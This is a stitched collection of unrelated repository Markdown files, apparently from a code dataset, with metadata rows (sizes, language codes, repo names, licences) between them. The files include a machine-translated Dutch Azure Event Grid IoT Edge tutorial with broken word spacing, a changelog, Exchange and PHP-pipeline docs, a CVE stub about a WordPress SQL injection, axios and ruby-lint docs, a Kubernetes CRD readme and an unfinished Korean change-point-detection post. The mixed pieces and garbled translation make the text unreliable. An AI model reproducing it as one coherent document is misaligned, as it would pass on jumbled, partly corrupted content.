Zie [Event grid concepten](concepts.md) om te begrijpen wat een event grid-onderwerp en-abonnement zijn voordat u verdergaat.
## <a name="prerequisites"></a>Vereisten
Als u deze zelf studie wilt volt ooien, hebt u het volgende nodig:
* **Azure-abonnement** : Maak een [gratis account](https://azure.microsoft.com/free) als u er nog geen hebt.
* **Azure IOT hub en IOT edge apparaat** : Volg de stappen in de Quick start voor [Linux](../../iot-edge/quickstart-linux.md) -of [Windows-apparaten](../../iot-edge/quickstart.md) als u er nog geen hebt.
[!INCLUDE [event-grid-deploy-iot-edge](../../../includes/event-grid-deploy-iot-edge.md)]
## <a name="create-an-azure-function-in-the-azure-portal"></a>Een Azure-functie maken in de Azure Portal
Volg de stappen die worden beschreven in de [zelf studie](../../azure-functions/functions-create-first-azure-function.md) voor het maken van een Azure-functie.
Vervang het code fragment door de volgende code:
```csharp
#r "Newtonsoft.Json"
using System.Net;
using Microsoft.AspNetCore.Mvc;
using Microsoft.Extensions.Primitives;
using Newtonsoft.Json;
public static async Task<IActionResult> Run(HttpRequest req, ILogger log)
{
log.LogInformation("C# HTTP trigger function processed a request.");
string requestBody = await new StreamReader(req.Body).ReadToEndAsync();
dynamic data = JsonConvert.DeserializeObject(requestBody);
log.LogInformation($"C# HTTP trigger received {data}.");
return data != null
? (ActionResult)new OkResult()
: new BadRequestObjectResult("Please pass in the request body");
}
```
Selecteer in de nieuwe functie rechtsboven **functie-URL ophalen** , Selecteer standaard (**functie toets**) en selecteer vervolgens **kopiëren**. Verderop in de zelf studie gebruikt u de waarde van de functie-URL.
> [!NOTE]
> Raadpleeg de [Azure functions](../../azure-functions/functions-overview.md) -documentatie voor meer voor beelden en zelf studies over het opnieuw handelen van gebeurtenissen met behulp van EventGrid-gebeurtenis triggers.
## <a name="create-a-topic"></a>Een onderwerp maken
Als uitgever van een gebeurtenis moet u een event grid-onderwerp maken. Onderwerp verwijst naar een eind punt waarnaar uitgevers gebeurtenissen kunnen verzenden.
1. Maak topic2.jsmet de volgende inhoud. Zie onze [API-documentatie](api.md) voor meer informatie over de payload.
```json
{
"name": "sampleTopic2",
"properties": {
"inputschema": "eventGridSchema"
}
}
```
1. Voer de volgende opdracht uit om het onderwerp te maken. De HTTP-status code van 200 OK moet worden geretourneerd.
```sh
curl -k -H "Content-Type: application/json" -X PUT -g -d @topic2.json https://<your-edge-device-public-ip-here>:4438/topics/sampleTopic2?api-version=2019-01-01-preview
```
1. Voer de volgende opdracht uit om het onderwerp te controleren dat is gemaakt. De HTTP-status code van 200 OK moet worden geretourneerd.
```sh
curl -k -H "Content-Type: application/json" -X GET -g https://<your-edge-device-public-ip-here>:4438/topics/sampleTopic2?api-version=2019-01-01-preview
```
Voorbeelduitvoer:
```json
[
{
"id": "/iotHubs/eg-iot-edge-hub/devices/eg-edge-device/modules/eventgridmodule/topics/sampleTopic2",
"name": "sampleTopic2",
"type": "Microsoft.EventGrid/topics",
"properties": {
"endpoint": "https://<edge-vm-ip>:4438/topics/sampleTopic2/events?api-version=2019-01-01-preview",
"inputSchema": "EventGridSchema"
}
}
]
```
## <a name="create-an-event-subscription"></a>Een gebeurtenisabonnement maken
Abonnees kunnen zich registreren voor gebeurtenissen die naar een onderwerp worden gepubliceerd. Als u een gebeurtenis wilt ontvangen, moeten de abonnees een event grid-abonnement maken op een onderwerp van belang.
[!INCLUDE [event-grid-deploy-iot-edge](../../../includes/event-grid-edge-persist-event-subscriptions.md)]
1. Maak subscription2.jsmet de volgende inhoud. Raadpleeg onze [API-documentatie](api.md) voor meer informatie over de payload.
```json
{
"properties": {
"destination": {
"endpointType": "WebHook",
"properties": {
"endpointUrl": "<your-az-func-cloud-url>"
}
}
}
}
```
>[!NOTE]
> De **endpointType** geeft aan dat de abonnee een webhook is. De **endpointUrl** geeft de URL aan waar de abonnee naar gebeurtenissen luistert. Deze URL komt overeen met de Azure function-voor beeld die u eerder hebt ingesteld.
2. Voer de volgende opdracht uit om het abonnement te maken. De HTTP-status code van 200 OK moet worden geretourneerd.
```sh
curl -k -H "Content-Type: application/json" -X PUT -g -d @subscription2.json https://<your-edge-device-public-ip-here>:4438/topics/sampleTopic2/eventSubscriptions/sampleSubscription2?api-version=2019-01-01-preview
```
3. Voer de volgende opdracht uit om het abonnement te controleren dat is gemaakt. De HTTP-status code van 200 OK moet worden geretourneerd.
```sh
curl -k -H "Content-Type: application/json" -X GET -g https://<your-edge-device-public-ip-here>:4438/topics/sampleTopic2/eventSubscriptions/sampleSubscription2?api-version=2019-01-01-preview
```
Voorbeelduitvoer:
```json
{
"id": "/iotHubs/eg-iot-edge-hub/devices/eg-edge-device/modules/eventgridmodule/topics/sampleTopic2/eventSubscriptions/sampleSubscription2",
"type": "Microsoft.EventGrid/eventSubscriptions",
"name": "sampleSubscription2",
"properties": {
"Topic": "sampleTopic2",
"destination": {
"endpointType": "WebHook",
"properties": {
"endpointUrl": "<your-az-func-cloud-url>"
}
}
}
}
```
## <a name="publish-an-event"></a>Een gebeurtenis publiceren
1. Maak event2.jsmet de volgende inhoud. Raadpleeg onze [API-documentatie](api.md) voor meer informatie over de payload.
```json
[
{
"id": "eventId-func-1",
"eventType": "recordInserted",
"subject": "myapp/vehicles/motorcycles",
"eventTime": "2019-07-28T21:03:07+00:00",
"dataVersion": "1.0",
"data": {
"make": "Ducati",
"model": "Monster"
}
}
]
```
1. Voer de volgende opdracht uit om de gebeurtenis te publiceren
```sh
curl -k -H "Content-Type: application/json" -X POST -g -d @event2.json https://<your-edge-device-public-ip-here>:4438/topics/sampleTopic2/events?api-version=2019-01-01-preview
```
## <a name="verify-event-delivery"></a>Gebeurtenis levering verifiëren
U kunt de gebeurtenis weer geven die in de Azure Portal is geleverd met de optie **monitor** van uw functie.
## <a name="cleanup-resources"></a>Resources opruimen
* Voer de volgende opdracht uit om het onderwerp en alle bijbehorende abonnementen te verwijderen
```sh
curl -k -H "Content-Type: application/json" -X DELETE https://<your-edge-device-public-ip-here>:4438/topics/sampleTopic2?api-version=2019-01-01-preview
```
* Verwijder de Azure-functie die in de Azure Portal is gemaakt.
## <a name="next-steps"></a>Volgende stappen
In deze zelf studie hebt u een event grid-onderwerp,-abonnement en-gepubliceerde gebeurtenissen gemaakt. Nu u de basis stappen kent, raadpleegt u de volgende artikelen:
* Zie [probleemoplossings gids voor informatie](troubleshoot.md)over het oplossen van problemen met het gebruik van Azure Event Grid op IOT Edge.
* Een abonnement met [filters](advanced-filtering.md)maken/bijwerken.
* Persistentie van Event Grid module instellen in [Linux](persist-state-linux.md) of [Windows](persist-state-windows.md)
* Volg de [documentatie](configure-client-auth.md) voor het configureren van client verificatie
* Door sturen van gebeurtenissen naar Azure Event Grid in de Cloud door deze [zelf studie](forward-events-event-grid-cloud.md) te volgen
* [Onderwerpen en abonnementen bewaken aan de rand](monitor-topics-subscriptions.md)
| 44.629808 | 303 | 0.698912 | nld_Latn | 0.968759 |
97247c12ddc0e135761bf94e8c7431978ce91b47 | 286 | md | Markdown | CHANGELOG.md | lundmorten/endomondo-workouts | 479fcdbac424a7a038f149f01906bfd85f9c2aba | [
"Apache-2.0"
] | 2 | 2019-03-14T17:11:38.000Z | 2020-06-23T12:23:18.000Z | CHANGELOG.md | lundmorten/endomondo-workouts | 479fcdbac424a7a038f149f01906bfd85f9c2aba | [
"Apache-2.0"
] | 1 | 2018-09-28T11:51:23.000Z | 2018-10-11T13:10:23.000Z | CHANGELOG.md | lundmorten/endomondo-workouts | 479fcdbac424a7a038f149f01906bfd85f9c2aba | [
"Apache-2.0"
] | 1 | 2018-09-13T18:51:51.000Z | 2018-09-13T18:51:51.000Z | # Change Log
All notable changes to this project will be documented in this file.
## [1.0.2] - 2017-08-31
Important fix! Timezone for GPX export was wrong.
## [1.0.1] - 2017-08-24
Add new Endomondo workout type.
Rename spinning to indoor cycling.
## [1.0.0] - 2017-03-31
Let's start. | 23.833333 | 68 | 0.706294 | eng_Latn | 0.967785 |
97252315d23dae48beb2da6051eac3e9ae0acb70 | 998 | md | Markdown | Exchange-Server-2013/messaging-records-management-procedures-exchange-2013-help.md | isabella232/OfficeDocs-Exchange-Test-pr.zh-tw | 98a1d49d2fd7fd30fd50bc9e0b4a88c65dcee1a9 | [
"CC-BY-4.0",
"MIT"
] | 2 | 2020-05-19T19:13:35.000Z | 2021-04-21T00:13:50.000Z | Exchange-Server-2013/messaging-records-management-procedures-exchange-2013-help.md | MicrosoftDocs/OfficeDocs-Exchange-Test-pr.zh-tw | 98a1d49d2fd7fd30fd50bc9e0b4a88c65dcee1a9 | [
"CC-BY-4.0",
"MIT"
] | 24 | 2018-06-19T08:32:58.000Z | 2018-09-26T16:49:19.000Z | Exchange-Server-2013/messaging-records-management-procedures-exchange-2013-help.md | isabella232/OfficeDocs-Exchange-Test-pr.zh-tw | 98a1d49d2fd7fd30fd50bc9e0b4a88c65dcee1a9 | [
"CC-BY-4.0",
"MIT"
] | 11 | 2018-06-19T07:21:46.000Z | 2021-11-15T11:18:50.000Z | ---
title: '通訊記錄管理程序: Exchange Online Help'
TOCTitle: 通訊記錄管理程序
ms:assetid: bc2ff408-4a2b-4202-9515-e3e922a6320d
ms:mtpsurl: https://technet.microsoft.com/zh-tw/library/JJ150558(v=EXCHG.150)
ms:contentKeyID: 50474066
ms.date: 05/23/2018
mtps_version: v=EXCHG.150
ms.translationtype: MT
---
# 通訊記錄管理程序
_**適用版本:** Exchange Server 2013_
_**上次修改主題的時間:** 2012-10-14_
[建立保留原則](https://docs.microsoft.com/zh-tw/exchange/security-and-compliance/messaging-records-management/create-a-retention-policy)
[若要保留標記中新增或移除保留標記的保留原則](https://docs.microsoft.com/zh-tw/exchange/security-and-compliance/messaging-records-management/add-or-remove-retention-tags)
[將保留原則套用至信箱](https://docs.microsoft.com/zh-tw/exchange/security-and-compliance/messaging-records-management/apply-retention-policy)
[設定受管理的資料夾助理員](configure-the-managed-folder-assistant-exchange-2013-help.md)
[就地保留信箱保留 」 狀態](https://docs.microsoft.com/zh-tw/exchange/security-and-compliance/messaging-records-management/mailbox-retention-hold)
| 33.266667 | 148 | 0.794589 | yue_Hant | 0.256292 |
97259644f2e80f4d287486da4b7ffe34f6402b41 | 25 | md | Markdown | docs/details/uni/pre-admissions/others/README.md | iUoB/help.iuob.uk | c2546cd1cff5a80821fafd60ac6359b49346a1a9 | [
"MIT"
] | 3 | 2021-07-01T01:36:06.000Z | 2021-07-16T06:49:02.000Z | docs/details/uni/pre-admissions/others/README.md | iUoB/help.iuob.uk | c2546cd1cff5a80821fafd60ac6359b49346a1a9 | [
"MIT"
] | 34 | 2021-03-02T05:31:16.000Z | 2021-08-30T09:11:16.000Z | docs/details/uni/pre-admissions/others/README.md | iUoB/help.iuob.uk | c2546cd1cff5a80821fafd60ac6359b49346a1a9 | [
"MIT"
] | 3 | 2021-06-28T08:37:56.000Z | 2021-07-14T12:07:51.000Z | # 伯明翰大学入学前未归类问题
[[toc]]
| 6.25 | 15 | 0.64 | vie_Latn | 0.09082 |
97267197ab2d40d3efe0381a4cd8406966fd5433 | 1,273 | md | Markdown | README.md | pyguerder/bitbucket-pipelines-php81 | 5c8cbcf98777e7087948697edf6d71d0146b1b35 | [
"MIT"
] | null | null | null | README.md | pyguerder/bitbucket-pipelines-php81 | 5c8cbcf98777e7087948697edf6d71d0146b1b35 | [
"MIT"
] | null | null | null | README.md | pyguerder/bitbucket-pipelines-php81 | 5c8cbcf98777e7087948697edf6d71d0146b1b35 | [
"MIT"
] | null | null | null | # Bitbucket Pipelines PHP 8.1 image
[](https://microbadger.com/images/pyguerder/bitbucket-pipelines-php81 "Get your own version badge on microbadger.com") [](https://microbadger.com/images/pyguerder/bitbucket-pipelines-php81 "Get your own image badge on microbadger.com")
## Based on Ubuntu 20.04
### Packages installed
- `php8.1-zip`, `php8.1-xml`, `php8.1-mbstring`, `php8.1-curl`, `php8.1-json`, `php8.1-imap`, `php8.1-mysql`, `php8.1-tokenizer`, `php8.1-xdebug`, `php8.1-intl`, `php8.1-soap`, `php8.1-pdo`, `php8.1-cli`, `php8.1-apcu` and `php8.1-gd`
- wget, curl, unzip
- Composer 2
- Mysql 8 (or 5.7 if you use `pyguerder/bitbucket-pipelines-php81:mysql5`)
- Node 14 + Yarn
### Sample `bitbucket-pipelines.yml`
```YAML
image: pyguerder/bitbucket-pipelines-php81
pipelines:
default:
- step:
script:
- service mysql start
- mysql -h localhost -u root -proot -e "CREATE DATABASE test;"
- composer install --no-interaction --no-progress --prefer-dist
- ./vendor/phpunit/phpunit/phpunit -v --coverage-text --colors=never --stderr
```
| 45.464286 | 413 | 0.695994 | yue_Hant | 0.153641 |
9726f8eb3e6974c9e452d56d2ccf1e8b6a11af88 | 603 | md | Markdown | 2020/CVE-2020-20625.md | justinforbes/cve | 375c65312f55c34fc1a4858381315fe9431b0f16 | [
"MIT"
] | 2,340 | 2022-02-10T21:04:40.000Z | 2022-03-31T14:42:58.000Z | 2020/CVE-2020-20625.md | justinforbes/cve | 375c65312f55c34fc1a4858381315fe9431b0f16 | [
"MIT"
] | 19 | 2022-02-11T16:06:53.000Z | 2022-03-11T10:44:27.000Z | 2020/CVE-2020-20625.md | justinforbes/cve | 375c65312f55c34fc1a4858381315fe9431b0f16 | [
"MIT"
] | 280 | 2022-02-10T19:58:58.000Z | 2022-03-26T11:13:05.000Z | ### [CVE-2020-20625](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-20625)



### Description
Sliced Invoices plugin for WordPress 3.8.2 and earlier allows unauthenticated information disclosure and authenticated SQL injection via core/class-sliced.php.
### POC
#### Reference
No PoCs from references.
#### Github
- https://github.com/s-index/dora
| 33.5 | 159 | 0.749585 | eng_Latn | 0.241565 |
972711f81d584f69d73f8220c838a45cade3dbb4 | 1,151 | md | Markdown | docs/content/en/extend.md | Dexalt142/axios-module | b983b3d707f97a80f490c55f38800f894b9c3481 | [
"MIT"
] | null | null | null | docs/content/en/extend.md | Dexalt142/axios-module | b983b3d707f97a80f490c55f38800f894b9c3481 | [
"MIT"
] | null | null | null | docs/content/en/extend.md | Dexalt142/axios-module | b983b3d707f97a80f490c55f38800f894b9c3481 | [
"MIT"
] | null | null | null | ---
title: 'Extending Axios'
description: ''
position: 2
category: 'Extending Axios'
---
If you need to customize axios by registering interceptors and changing global config, you have to create a nuxt plugin.
**nuxt.config.js**
```js
{
modules: [
'@nuxtjs/axios',
],
plugins: [
'~/plugins/axios'
]
}
```
**plugins/axios.js**
```js
export default function ({ $axios, redirect }) {
$axios.onRequest(config => {
console.log('Making request to ' + config.url)
})
$axios.onError(error => {
const code = parseInt(error.response && error.response.status)
if (code === 400) {
redirect('/400')
}
})
}
```
### Create new axios instance based on defaults
If you need to create your own axios instance which based on $axios defaults, you can use `create` method.
```js
export default function ({ $axios }, inject) {
// Create a custom axios instance
const api = $axios.create({
headers: {
common: {
Accept: 'text/plain, */*'
}
}
})
// Set baseURL to something different
api.setBaseURL('https://my_api.com')
// Inject to context as $api
inject('api', api)
}
```
| 17.984375 | 120 | 0.622937 | eng_Latn | 0.799565 |
9727f2e94312c9056f70366643222e929b02487e | 3,779 | md | Markdown | doc/configuration.md | bbatsov/ruby-lint | 81ca8a71802e99d2e56f170984c7f2401c9f7f87 | [
"MIT"
] | 2 | 2015-11-08T19:00:54.000Z | 2016-10-22T23:41:59.000Z | doc/configuration.md | bbatsov/ruby-lint | 81ca8a71802e99d2e56f170984c7f2401c9f7f87 | [
"MIT"
] | null | null | null | doc/configuration.md | bbatsov/ruby-lint | 81ca8a71802e99d2e56f170984c7f2401c9f7f87 | [
"MIT"
] | null | null | null | # @title Configuration
# Configuration
The default configuration of ruby-lint should be suitable for most people.
However, depending on your code base you may get an usual amount of false
positives. In particular the class {RubyLint::Analysis::UndefinedMethods} can
produce a lot of false positives.
ruby-lint allows developers to customize the various parts of the tool such as
what kind of messages to report and what types of analysis to run. This can be
done in two different ways:
1. Using CLI options
2. Using a configuration file
The first option is useful if you want to change something only once or if
you're messing around with the various options. If you actually want your
changes to stick around you'll want to use a configuration file instead.
## File Locations
When running the CLI ruby-lint will try to load one of the following two
configuration files:
* $PWD/ruby-lint.yml
* $HOME/.ruby-lint.yml
Here `$PWD` refers to the current working directory and `$HOME` to the user's
home directory. If ruby-lint finds a configuration file in the current working
directory the global one will *not* be loaded. This allows you to use project
specific settings in combination with a global configuration file as a
fallback.
## Configuring ruby-lint
Configuration files are simple YAML files. An example of such a configuration
file is the following:
---
directories:
- lib
ignore_paths:
- lib/ruby-lint/definitions
- lib/ruby-lint/cli
### requires
The `requires` option can be used to specify a list of Ruby files that should
be loaded before analysis is performed. The primary use case of this option is
to load extra definitions that don't come with ruby-lint by default.
Example:
---
requires:
- ruby-lint/definitions/gems/devise
By default this option is left empty. You do not need to use this option for
loading built-in definitions unless stated otherwise. For example, definitions
for Rails are loaded automatically.
### report_levels
The `report_levels` option can be used to specify a list of the enabled
reporting levels. The following levels are currently available:
* info
* warning
* error
By default all of these are enabled.
Example:
---
report_levels:
- warning
- error
### presenter
The short, human readable name of the presenter to use for displaying the
analysis results. The following presenters are currently available:
* text
* json
* syntastic
The default presenter is `text`.
Example:
---
presenter: text
### analysis_classes
A list of the short, human readable names of the analysis classes to enable.
The following analysis classes are currently available:
* `argument_amount`
* `pedantics`
* `shadowing_variables`
* `undefined_methods`
* `undefined_variables`
* `unused_variables`
* `useless_equality_checks`
By default all of these are enabled.
Example:
---
analysis_classes:
- argument_amount
- pedantics
### directories
A list of directories to search in for externally defined constants. By default
this is set to `$PWD/app` and `$PWD/lib` (depending on which directories
exist). For most applications you do not need to change this value.
Example:
---
directories:
- app
- lib
### debug
A boolean that indicates that debugging mode should be enabled or disabled, by
default this is disabled.
Example:
---
debug: true
### ignore_paths
A list of patterns to apply to the `directories` option to filter out unwanted
directories. For example, you could use this to search for files in the lib/
directory but exclude lib/foo/bar:
---
directories:
- lib
ignore_paths:
- lib/foo/bar
Example:
---
ignore_paths:
- lib/ruby-lint/definitions
| 23.61875 | 79 | 0.739878 | eng_Latn | 0.999094 |
9728090e654e554a487aa463859cd4db0054736c | 1,867 | md | Markdown | contrib/crds/Readme.md | florkbr/kcp | 33ba15f95927daeaf0239f6176e08becff0cae3d | [
"Apache-2.0"
] | 1,189 | 2021-05-05T06:30:17.000Z | 2022-03-30T13:14:08.000Z | contrib/crds/Readme.md | florkbr/kcp | 33ba15f95927daeaf0239f6176e08becff0cae3d | [
"Apache-2.0"
] | 509 | 2021-05-05T00:26:21.000Z | 2022-03-31T16:56:19.000Z | contrib/crds/Readme.md | florkbr/kcp | 33ba15f95927daeaf0239f6176e08becff0cae3d | [
"Apache-2.0"
] | 154 | 2021-05-05T09:07:30.000Z | 2022-03-24T14:01:48.000Z | ## CRDs for basic legacy schema resources
The folder contains CRDs for useful legacy scheme resources (`Pod`s, `Deployment`s) to be added in the KCP control plane.
This is mainly to be able to start using KCP with meaningful resources, even before having implemented:
- the concept of a physical cluster registered to the KCP
- the import of underlying physical cluster APIResources as CRDs in KCP.
## Generation source
These CRDs have been generated from the related Kube APIs through the `kubebuilder` `controller-gen` tool.
However, before the generation, the types had to be fixed in order to:
- Add required `kubebuilder` annotation such as `groupName`, sub-resource-related annotations, ...
- `listType` and `listMapKeys` annotations wherever `patchStrategy` and `patchergeKey` was used, in order not to loose this precious information, since `patchStrategy` and `patchMergeKey` vendor extensions do not exist in CRD OpenAPI schema.
The following PR against the KCP `kubernetes` repository: https://github.com/kcp-dev/kubernetes/pull/2 contains the changes made to the GO types to enable the generation of valid CRDs that can be successfully used, even with the Strategic Merge Patch support for CRDs, added in commit https://github.com/kcp-dev/kubernetes/commit/33131378ff6e98ef3f5fdcf39fe40b8ed20da47b of the KCP `kubernetes` repository
## How to rebuild the CRDs
You can find the steps used to build those CRDs inside the `generate-crds.sh` script.
You can also simply run this script from this folder:
```
> ./generate-crds .
Checking the presence of 'controller-gen'
Cloning Kubernetes 'crd-compatible-core-and-apps-types' branch into .../go/src/github.com/kcp-dev/kcp/contrib/crds/crd-build
Generating core/v1 CRDs
Removing unnecessary core/v1 resources
Adding the 'core' group as a suffix in the name of core/v1 CRDs
Generating apps/v1 CRDs
```
| 58.34375 | 405 | 0.789502 | eng_Latn | 0.986728 |
9728b29e5994eeccdaa58952008d0399a9ba800f | 440 | md | Markdown | content/publication/hillier-2019-landscape/index.md | theosanderson/theo.io | 62c3b42cae93bcf0a467a25e1f9f7b69a10b0ab5 | [
"MIT"
] | null | null | null | content/publication/hillier-2019-landscape/index.md | theosanderson/theo.io | 62c3b42cae93bcf0a467a25e1f9f7b69a10b0ab5 | [
"MIT"
] | null | null | null | content/publication/hillier-2019-landscape/index.md | theosanderson/theo.io | 62c3b42cae93bcf0a467a25e1f9f7b69a10b0ab5 | [
"MIT"
] | null | null | null | ---
title: "Landscape of the Plasmodium interactome reveals both conserved and species-specific functionality"
date: 2019-01-01
publishDate: 2021-01-21T16:48:35.960455Z
authors: ["Charles Hillier", "Mercedes Pardo", "Lu Yu", "Ellen Bushell", "Theo Sanderson", "Tom Metcalf", "Colin Herd", "Burcu Anar", "Julian C Rayner", "Oliver Billker", " others"]
publication_types: ["2"]
abstract: ""
featured: false
publication: "*Cell reports*"
---
| 36.666667 | 181 | 0.727273 | eng_Latn | 0.381284 |
9728eb121db2180665d2e590a225feded8d827da | 5,436 | md | Markdown | _posts/2020-06-21-likelihood.md | ChiOni/chioni.github.io | 9e58c0a5f89998d385bb00224c33ea2a5c5d6d46 | [
"MIT"
] | null | null | null | _posts/2020-06-21-likelihood.md | ChiOni/chioni.github.io | 9e58c0a5f89998d385bb00224c33ea2a5c5d6d46 | [
"MIT"
] | null | null | null | _posts/2020-06-21-likelihood.md | ChiOni/chioni.github.io | 9e58c0a5f89998d385bb00224c33ea2a5c5d6d46 | [
"MIT"
] | 1 | 2020-01-24T14:11:36.000Z | 2020-01-24T14:11:36.000Z | ---
title: Likelihood Ratio Methods (Change Point Detection)
date: 2020-06-21 00:00:00 +0800
categories: [Code Excercise, Change Point Detection]
tags: [change point, likelihood ratio]
seo:
date_modified: 2020-07-18 14:17:37 +0900
---
> In statistical analysis, **change detection** or **change point detection** tries to identify times when the probability distribution of a stochastic process or time series changes. In general the problem concerns both detecting whether or not a change has occurred, or whether several changes might have occurred, and identifying the times of any such changes.
### <b>배경</b>
[A Survey of Methods for Time Series Change Point Detection 2017](https://www.researchgate.net/publication/307947624_A_Survey_of_Methods_for_Time_Series_Change_Point_Detection)
- Unsupervised Change Point Detection
- **Likelihood Ratio Methods**
- Subspace Model
- Probabilistic Methods
- Kernel Based Methods
- Graph Based Methods
### <b>목차</b>
1. Unsupervised Change Point Detection 접근법 중 `Likelihood Ratio Methods`의 특징을 살펴본다.
2. 해당 방법론의 기본이 되는 논문을 하나 리뷰한다.
3. 파이썬을 사용하여 (2) 논문의 알고리즘을 구현한다.
# <b>Likelihood Ratio Methods</b>
보편적인 통계적 Change Point Detection은 포인트를 중심으로 앞과 뒤 분포 차이의 유의성을 비교하는 방식으로 진행된다. 그 중, Likelihood Ratio Method는 포인트를 중심으로 한 두 연속적인 인터벌의 logarithm of the likelihood ratio를 모니터링하며 Change Point를 찾아낸다.
<br/>
<b>Two Step Algorithm</b>
1. 두 구간의 확률 분포를 각각 계산한다.
2. 확률 분포 차이의 비율을 계산한다.
<br/>
<b>Species of Likelihood Ratio Methods</b>
1. Cumulative Sum
- accumulates deviations relative to a specified target of incoming measurements and indicates that a change point exists when the cumulative sum exceeds a specified threshold
2. Change Finder
- Fits an Auto Regression (AR) model onto the data to represent the statistical behavior of the time series and updates its parameter estimates incrementally so that the effect of past examples is gradually discounted
3. **direct density-ratio estimation**
- **model the density ratio between two consequent intervals *χ* and *χ′* by a non-parametric Gaussian kernel model**
4. *α*-relative density ratio estimation
- reduced to a plain density ratio if *α =* 0, and it tends to be “smoother” as *α* gets larger
5. Semi-Parametric Log-Likelihood Change Detector
- semi-parametric change detector based on Kullback-Leibler statistics
<br/>
Change Detection 방법 중, Likelihood Ratio Method만 보더라도 정말 다양한 방법과 statistic을 활용하여 모델링을 수행한다는 것을 알 수 있다. 그 중, (1)과 (2)의 방법은 **rely on pre-designed parametric models**하다는 한계점을 가지고 있다. 또한 (4)와 (5)는 **direct density-ratio estimation** 방법의 응용이라고 볼 수 있다고 하니, (3)번 방법론을 소개한 논문을 하나 살펴보도록 한다.
# <b>Direct Density-Ratio Estimation</b>
논문 링크: [Sequential change‐point detection based on direct density‐ratio estimation(2011)](http://www.ms.k.u-tokyo.ac.jp/2012/CDKLIEP.pdf)
<br/>
**Abstract**
> estimate the ratio of probability not the probability densities themselves.
> (← 방향의 측정은 가능하지만 그 역은 성립하지 않는다)
> online 상황에서도 효율적으로 적용가능한 direct density-ratio estimation 기법을 제안한다.
<br/>
**Introduction**
Change Point Detection에서 가장 일반적이라고 볼 수 있는 방법은 과거 구간 X와 현재 구간 X'의 확률 분포를 각각 구한 후, 그 둘의 발산 정도를 계산하는 것이였다. KL-divergence 등의 statistic을 사용하여 the logarithm of the likelihood ratio를 측정하는 CUSUM GLR 등의 기법들이 사용되어 왔다고 한다. 그런데 이런 과거의 기법들은 pre specified parametric model이나 some specific quantities에 의존하여 Change Point를 찾는 한계점이 존재했다. 따라서 논문이 목적하는 바는 모델에 대한 딱딱한 가정 없이 현실 세계에 적용한 non-parametric method를 고안하는 것이다.
그러나 KDE 등을 사용하여 non-parametric하게 분포를 직접 추정하는 것은 어려운 일이다. 따라서 확률 밀도를 직접 계산하지 않고 인터벌간의 비율만을 계산하는 방식을 적용한다. 최근(2011년 기준) direct density-ratio estimation 기법 중 괜찮은 것이 Kullback-Leibler Importance Estimation Procedure (KLIEP) 라고 하는데, 논문에서는 이것을 online 상황에서 적용할 수 있는 알고리즘으로 개선하고 Change Point Detection Task에 적용해본다.
<br/>
#### <b>Problem Formulation</b>
<img src="/assets/img/pe/changepoint/likelihood/likelihoodone.jpg">
- Y(t)는 k 길이의 sequence data
- logarithm of the likelihood ratio of sequence s(Y) = ln( p_te(Y) / p_rf(Y) )
- p_te(Y): probability density functions of the test sequence samples
- p_rf(Y): probability density functions of the reference sequence samples
test와 reference 각 interval 안에서의 확률 분포는 어떤 샘플을 뽑던 동일하고
test와 reference 간의 확률 분포는 동일하지 않다면
t_te가 바로 `change point`가 된다.
<br/>
[likelihood ratio test](https://www.sciencedirect.com/topics/computer-science/likelihood-ratio)의 컨셉을 이해했다면 test statistic을 이해할 수 있다. 귀무가설이 되는 것이 모든 구간의 샘플을 뽑았을 때의 확률 분포가 reference interval의 확률 분포와 동일하다는 것이니, Test Interval의 샘플들이 분포가 일정하게 유지되는지 확인하면 된다.
<img src="/assets/img/pe/changepoint/likelihood/likelihoodtwo.jpg">
그러나 non parametric density estimation을 계산하는 것은 복잡한 과제이다. 따라서 Ratio Statistic을 분포를 추정한 후 대입하여 얻지 말고, 분포간의 비율만을 계산하여 얻자.
#### <b> Direct Density-Ratio Estimation</b>
> 논문에서 표현이 혼용된 부분이 있는데, Traing Interval과 Reference Interval이 동일한 개념이다.
<img src="/assets/img/pe/changepoint/likelihood/likelihoodthree.JPG">
<center><small>논문에서 풀고자하는 Optimization Problem</small></center>
<br/>
위의 식이 어떻게 도출되는지는 해당 논문보다 Kullback-Leibler Importance Estimation Procedure (KLIEP)가 처음 고안된 [링크](https://www.ism.ac.jp/editsec/aism/pdf/060_4_0699.pdf)에서 자세히 설명해주고 있다. 요약하자면,
- Train Interval의 값을 어떤 모델 w로 태워서 Test Interval의 밀도 te`을 추정할 것인데,
실제 밀도 te의 기댓값을 사용하여 KL(te/te`) divergence을 최소화하도록 모델 w을 학습할 것이다.
<img src="/assets/img/pe/changepoint/likelihood/likelihoodfour.JPG">
첫 번째 텀은 학습할 수 있는 파라미터와 독립적이기 때문에 뒤에 것만 극대화해주면 된다.
(작성중 ... )
| 38.828571 | 400 | 0.753679 | kor_Hang | 0.999766 |
9728eeb04b220f6cd0f532feac7089fcb7a74d33 | 1,363 | md | Markdown | src/engines/dotnet/features/character-class-escapes.md | rbuckton/regexp-features | 8a2b739b938f33d8df1fc0716350fa2e32545439 | [
"BSD-3-Clause"
] | 3 | 2021-07-23T20:13:08.000Z | 2021-07-24T03:33:50.000Z | src/engines/dotnet/features/character-class-escapes.md | rbuckton/regexp-features | 8a2b739b938f33d8df1fc0716350fa2e32545439 | [
"BSD-3-Clause"
] | 7 | 2021-07-26T20:09:45.000Z | 2021-08-18T05:03:42.000Z | src/engines/dotnet/features/character-class-escapes.md | rbuckton/regexp-features | 8a2b739b938f33d8df1fc0716350fa2e32545439 | [
"BSD-3-Clause"
] | null | null | null | ---
### YamlMime:EngineFeature
engine: dotnet
feature: character-class-escapes
supported: true
reference: https://docs.microsoft.com/en-us/dotnet/standard/base-types/character-classes-in-regular-expressions#word-character-w
#description: *content.description
syntax: *content.syntax
#example: *content.example
---
# syntax
- `\d` — Any digit character. Equivalent to `\p{Nd}` unless in ECMAScript-compliant mode, in which case `\d` is equivalent to `[0-9]`.
- `\D` — Any non-digit character. Equivalent to `\P{Nd}` unless in ECMAScript-compliant mode, in which case `\D` is equivalent to `[^0-9]`.
- `\w` — Any "word" character. Equivalent to `[\p{Ll}\p{Lu}\p{Lt}\p{Lo}\p{Lm}\p{Mn}\p{Nd}\p{Pc}]` unless in ECMAScript-compliant mode, in which case `\w` is equivalent to `[a-zA-Z0-9_]`.
- `\W` — Any non-"word" character. Equivalent to `[^\p{Ll}\p{Lu}\p{Lt}\p{Lo}\p{Lm}\p{Mn}\p{Nd}\p{Pc}]` unless in ECMAScript-compliant mode, in which case `\W` is equivalent to `[^a-zA-Z0-9_]`.
